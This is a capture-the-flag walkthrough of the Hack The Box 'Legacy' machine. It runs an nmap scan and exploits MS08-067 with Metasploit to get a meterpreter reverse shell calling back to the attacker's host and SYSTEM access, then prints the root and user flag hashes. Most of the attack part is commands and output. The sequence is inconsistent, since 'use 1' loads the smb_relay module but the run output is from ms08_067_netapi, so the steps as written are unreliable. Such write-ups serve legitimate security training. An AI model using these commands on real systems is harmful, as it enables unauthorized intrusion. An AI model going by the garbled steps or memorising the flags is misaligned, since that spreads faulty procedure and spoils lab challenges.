HTB Walkthrough: Legacy
Initial Scanning
Let’s run our port scanner to identify active TCP services.
TCP Port Scan
Start a long scan:
$ cat nmap_full.log
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-02 04:07 EDT
Warning: 10.10.10.4 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.4
Host is up (0.080s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
Aggressive OS guesses: Microsoft Windows XP SP2 or SP3 (95%), Microsoft Windows XP SP3 (95%), Microsoft Windows 2003 SP2 (94%), Microsoft Windows Server 2003 SP1 (94%), Microsoft Windows Server 2003 SP1 or SP2 (94%), Microsoft Windows Server 2003 SP2 (93%), Microsoft Windows 2000 SP3/SP4 or Windows XP SP1/SP2 (92%), Microsoft Windows XP Professional SP2 or Windows Server 2003 (92%), Microsoft Windows XP SP2 or SP3, or Windows Embedded Standard 2009 (92%), Microsoft Windows XP SP2 - SP3 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_clock-skew: mean: 5d00h27m39s, deviation: 2h07m16s, median: 4d22h57m39s
|_smb2-time: Protocol negotiation failed (SMB2)
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 005056b962df (VMware)
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2023-04-07T13:09:37+03:00
Right off the bat, we see outdated OS and SMB2, with an SMB OS of Windows XP (Windows 2000 LAN Manager).
This box is screaming “MS08-067”. Here is a link to more information about this common vulnerability.
Initial Access
To save time, I ran the exploit in msfconsole, easily and quickly gaining initial access to the Windows machine.
$ msfconsole
$ search ms08-067
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack Corruption
1 exploit/windows/smb/smb_relay 2001-03-31 excellent No MS08-068 Microsoft Windows SMB Relay Code Execution
2 exploit/windows/browser/ms08_078_xml_corruption 2008-12-07 normal No MS08-078 Microsoft Internet Explorer Data Binding Memory Corruption
3 auxiliary/admin/ms/ms08_059_his2006 2008-10-14 normal No Microsoft Host Integration Server 2006 Command Execution Vulnerability
4 exploit/windows/browser/ms08_070_visual_studio_msmask 2008-08-13 normal No Microsoft Visual Studio Mdmask32.ocx ActiveX Buffer Overflow
5 exploit/windows/browser/ms08_041_snapshotviewer 2008-07-07 excellent No Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download
6 exploit/windows/browser/ms08_053_mediaencoder 2008-09-09 normal No Windows Media Encoder 9 wmex.dll ActiveX Buffer Overflow
7 auxiliary/fileformat/multidrop normal No Windows SMB Multi Dropper
$ use 1
msf6 exploit(windows/smb/smb_relay) > options
Module options (exploit/windows/smb/smb_relay):
Name Current Setting Required Description
---- --------------- -------- -----------
CAINPWFILE no Name of file to store Cain&Abel hashes in. Only supports NTLMv1 hashes. Can be a path.
JOHNPWFILE no Name of file to store JohnTheRipper hashes in. Supports NTLMv1 and NTLMv2 hashes, each of which is stored in separate files. Can also be a path.
RELAY_TARGETS yes Target address range or CIDR identifier to relay to
RELAY_TIMEOUT 25 yes Seconds that the relay socket will wait for a response after the client has initiated communication.
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SMBDomain WORKGROUP yes The domain name used during SMB exchange.
SMBSHARE no The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 445 yes The local port to listen on.
SRV_TIMEOUT 25 yes Seconds that the server socket will wait for a response after the client has initiated communication.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.0.86 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
$ set rhosts 10.10.10.4
$ set lhost tun0
$ run
[*] Started reverse TCP handler on 10.10.14.7:4444
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175686 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.14.7:4444 -> 10.10.10.4:1032) at 2023-04-02 04:30:31 -0400
$ shell
Success! The first thing I tried was checking for a hostname and username (with whoami). The hostname returned as LEGACY but “whoami” was not a recognized command.
To fix this, I remember that Kali has a copy of whoami.exe in /usr/share/windows-binaries/.
Metasploit made the upload of this file easy with its “upload” command. Since I had ran “shell” after gaining a shell to make it interactive, we first had to exit it with CTRL+Z.
After hitting CTRL+Z we could upload a file directly to the Windows machine by using the ‘upload’ meterpreter command.
$ upload /usr/share/windows-binaries/whoami.exe
Now, we can re-gain our interactive shell with the “shell” command and all that’s left to do is run the executable.
$ shell
C:\WINDOWS\system32>whoami.exe
whoami.exe
NT AUTHORITY\SYSTEM
We are already ROOT! Hooray.
Let’s just grab our flags, at this point.
Grabbing Flags
cd C:\
C:\>cd "Documents and Settings"
C:\Documents and Settings>dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B
Directory of C:\Documents and Settings
16/03/2017 09:07 �� <DIR> .
16/03/2017 09:07 �� <DIR> ..
16/03/2017 09:07 �� <DIR> Administrator
16/03/2017 08:29 �� <DIR> All Users
16/03/2017 08:33 �� <DIR> john
cd Administrator/Desktop
C:\Documents and Settings\Administrator\Desktop>type root.txt
993442d258b0e0ec917cae9e695d5713
Now just to grab the user flag.
cd ../../john/Desktop
C:\Documents and Settings\john\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B
Directory of C:\Documents and Settings\john\Desktop
16/03/2017 09:19 �� <DIR> .
16/03/2017 09:19 �� <DIR> ..
16/03/2017 09:19 �� 32 user.txt
C:\Documents and Settings\john\Desktop>type user.txt
e69af0e4f443de7e36876fda4ec7644f
Voila.
